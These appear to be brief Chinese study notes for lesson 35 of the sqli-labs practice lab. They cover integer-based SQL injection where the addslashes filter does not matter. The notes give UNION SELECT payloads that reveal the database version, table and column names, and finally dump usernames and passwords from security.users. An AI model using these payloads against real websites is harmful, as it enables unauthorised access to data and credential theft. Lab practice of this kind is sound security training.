Less（35）GET-Bypass Add Slashes(we dont need them)Interger based

1.是数字类型 的

2.爆破

　　（1）爆库：?id=-1 union select 1,version(),database()--+

　　　　

 

 

　　（2）爆表：?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+

　　

 

 

　　（3）爆列名：?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--+

　　　　

 

 

　　（4）爆值：?id=-1 union select 1,group_concat(username,0x7e,password),3 from security.users --+